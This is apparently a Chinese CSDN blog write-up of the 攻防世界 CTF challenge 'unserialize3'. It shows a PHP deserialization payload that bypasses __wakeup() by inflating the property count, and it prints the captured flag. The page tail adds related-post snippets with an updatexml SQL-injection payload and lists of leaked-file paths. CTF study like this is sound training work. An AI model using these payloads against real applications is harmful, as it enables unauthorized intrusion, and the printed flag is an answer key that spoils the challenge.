##[攻防世界]unserialize3题目wp

已于 2022-03-14 14:43:22 修改
阅读量4.5k 收藏
点赞数
文章标签: 安全 web安全
于 2022-03-13 19:30:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60787987/article/details/123464375
版权

##[攻防世界]unserialize3题目wp

从题目我们可以看出,这道题是一道基础的php反序列化题。而进入网址后我们可以看到如下代码

class xctf
{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

通过简单的代码分析我们可以看出这个代码主要定义了一个变量,然后又对该变量进行了反序列化,并且输出“bad request”这一字符串。而底下的?code= 我们猜测应该是用于传递数据的接口。所以综合来看,我们首先应该对该题目所给出的变量进行序列化并通过?code=进行上传,所以先构造序列化变量O:4:"xctf":1:{s:4:"flag";s:3:"111";}并上传。

接下来,我们想要使php反序列化漏洞产生可以更改上传数据的属性值导致其反序列化异常,所以payload为

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";},上传得到flag为cyberpeace{494901f6eab656bdc53420dde73ef168}

53420dde73ef168}

0x_1Ang
关注
[网络安全自学篇] 八十二.WHUCTF之隐写和逆向类解题思路WP(文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析)
杨秀璋的专栏
06-04 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。这篇文章将详细讲解WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
攻防世界】十二 --- unserialize3 --- php反序列化
qq_43168364的博客
12-25 534
题目unserialize3 一、writeup 一道php反序列化的题 关键点: 当审出存在反序列化漏洞时,我们将对应的那个类拿出到自己的php环境中,先用恶意字符串实例化该类然后用serialize()函数,进行序列化,将序列化好的东西抛出到环境中即可造成反序列化漏洞 当$flag='111’是可以看到flag,通过?code查询字符串来传入需要反序列化的字符串 反序列时会自动调用__wakeup() 函数,导致程序结束执行,因此要绕过 __wakeup() 函数(绕过的方法在知识点中有介绍)
反序列化(Unserialize)题目讲解
qq_49422880的博客
10-05 5813
[RCTF2015]EasySQL 这道题没有什么思路,就是看网上的WP写出,Sql-lib好像也有这道题。这里要使用的一种注入方法叫做二次注入。具体我就不细讲了。 直接放语句上去: admin"||(updatexml(1,concat(0x7e,(select(database()))),1))# 123"||(updatexml(1,concat(0x7e,(select(database()))),1))# ...
攻防世界WEB进阶之unserialize3
harry_c的博客
08-01 1665
攻防世界WEB进阶之unserialize3第一步:分析第二步:实操第三步:答案 难度系数: 1星 题目来源: 暂无 题目描述:暂无 第一步:分析 题目仅仅给出了一个场景打开场景看到了如下内容: class xctf{ public $flag = ‘111’; public function __wakeup(){ exit(‘bad requests’); } ?code= 通过分析在浏览器地...
攻防世界WEB---unserialize3
Red Rapefruit
07-23 1013
攻防世界WEBunserialize3 本文仅记录我自己的学习过程 unserialize3 题目: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 给出的是一个代码块页面,而且还是不完整的,在这里我们可以得到两部分内容:1.一个xctf的类;2.要返回一个code参数,还有题目提示的反序列化函数unserialize().既然是反序列化,那么code传入很有可能x
学习笔记 | PHP反序列化漏洞
最新发布
m0_57133419的博客
08-11 287
其中wakeup()函数漏洞原理是类对象属性个数超过实际个数,也就是其中的类名称后面跟的数字就是属性,修改为2时,不执行wakeup函数。就不会输出bad request,如果用没修改过的序列化语句就会输出bad request。看到wakeup函数,先构造序列化语句输出。攻防世界unserialize3
攻防世界 web高手进阶区 10分题 biscuiti-300
闵行小鱼塘
11-07 1069
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是biscuiti-300的writeup
攻防世界-web高手进阶区
zji
04-25 6597
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
web做题记录(buuoj,jarvis,攻防世界,bugku,hackme)
热门推荐
CJB6988125的博客
11-19 1万+
web做题笔记 buuoj easy_tornado tornado是一个python写的web服务器 读取文件hint.txt:md5(cookie_secret+md5(filename)) 我们只要找到cookie_secret 就能读取任意文件 直接搜cve:找到一个\r\n分割请求的。。好像搞不到cookie_secret 找到error?msg=Error模板注入??? {{1.}}出...
攻防世界-web进阶区
楼阁de猫的博客
10-30 987
目录baby_webTraining-WWW-Robots baby_web 题目描述:想想初始页面是哪个 打开链接看到这个界面 这里有两种解法 法一:我们输入index.php ,就会立即跳转到1.php 那我们就对index.php抓包看看 在请求头看到flag:flag{very_baby_web} 法二:题目提示说初始界面,但是url后面会自动跳转到1.php,我们可以在控制台找到初始界面, 按F12进入控制台点开原始的网址就可以看到 Training-WWW-Robots 打开链接是这样一个
ctf每日练习-第一天
想变得强大,虽然现在还弱不禁风
08-28 558
unserialize3(来自xctf web进阶区) unserialize3题目链接 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 原理: PHP反序列化漏洞:执行unserialize()时,先会调用__wakeup()。 当序列化字符串中属性值个数大于属性个数,就会导致反序列化异常,从而跳过__wakeup()。 本题_wakeup会执行exit(),所以要绕
攻防世界-web-高手进阶区-unserialize3
wyj_1216 House
07-10 931
题目 writeup class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } 分析上述代码,发现:_wakeup() 考虑反序列化 <?php class xctf{ public $flag = '111'; public function __wakeup(){ exi...
XCTF靶场实战(1)
weixin_51339377的博客
03-29 1266
新手练习区 1 禁用js 2 robots.txt在网站根目录 里面可以规定搜索引擎看或者不看什么内容 3 xxxx.txt.bak index.phpsxxxx.rar.zip.7z.tar.gz.bak.txt.swp github www.xxx.com/.git/config 苹果电脑 .DS_Store 文件/目录泄露 svn文件泄露 subversion,开源代码控制系统 www.xxx.com/.svn/entires ...
xctf攻防世界 Web高手进阶区 unserialize3
l8947943的博客
07-24 9315
深度剖析PHP序列化和反序列化
攻防世界-Webunserialize3解题思路
一个手掰橙的博客
09-23 3025
CTF解题思路
PHP反序列化小做
qq_74020399的博客
05-18 210
绕过方法:在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行wakeup()函数,即当前函数中只有一个参数$flag,若传入的序列化字符串中的参数个数为2即可绕过。原理:_wakeup()函数若不绕过则会将马上就要反序列化的字串中file给你替换为index,这样就会导致页面回到当前页面。在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行wakeup()函数。wakeup():反序列化之前检查执行的函数,不论如何都会优先执行wakeup()方法。
攻防世界web进阶
weixin_54787877的博客
02-21 304
unserialize3 知识点:反序列化漏洞,wakeup魔法函数 php <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= ?> 先对代码补全然后进行审计。 class xctf{ //定义一个名为xctf的类 public flag=′111′;//定义一个公有的类属性flag = '111';
CTF_Web:反序列化学习笔记(二)CTF经典考题由浅至深
AFCC_的博客(Web_Dog)
08-16 6877
0x00 CTF中的反序列化题目 这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 题目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
php序列化绕过wakeup,PHP反序列化漏洞#XCTF题 : unserialize3#绕过wakeup()函数
weixin_42544461的博客
03-22 513
1.代码与结果代码如下:class xctf{public $flag='111';public function __wakeup(){exit('bad requests');}}$content = new xctf();echo serialize($content);?>结果如下:O:4:"xctf":1:{s:4:"flag";s:3:"111";}实验截图:2.相关姿势点2.1...
攻防世界unserialize3
08-02
根据提供的引用内容,我们可以得到一个xctf类的代码块,其中包含了一个flag属性和一个__wakeup()方法。这个类的对象被序列化后,可以使用unserialize()函数将其还原为PHP的值。[2]在序列化过程中,serialize()函数会检查类中是否存在一个魔术方法__sleep(),如果存在,该方法会先被调用,然后才执行序列化操作。[3] 根据题目的描述,我们可以猜测在攻防世界unserialize3中,需要对传入的code参数进行反序列化操作。由于给出的代码块中有一个xctf类的序列化字符串,我们可以尝试使用unserialize()函数对其进行反序列化。具体的代码如下所示: ```php <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $code = $_GET['code']; // 获取传入的code参数 $obj = unserialize($code); // 反序列化code参数 // 判断反序列化后的对象是否为xctf类的实例 if ($obj instanceof xctf) { echo $obj->flag; // 输出flag属性的值 } else { echo 'Invalid code'; // 如果不是xctf类的实例,则输出错误信息 } ?> ``` 在上述代码中,我们首先获取传入的code参数,然后使用unserialize()函数对其进行反序列化操作。接着,我们判断反序列化后的对象是否为xctf类的实例,如果是,则输出flag属性的值;如果不是,则输出错误信息。这样就完成了对传入的code参数的反序列化操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值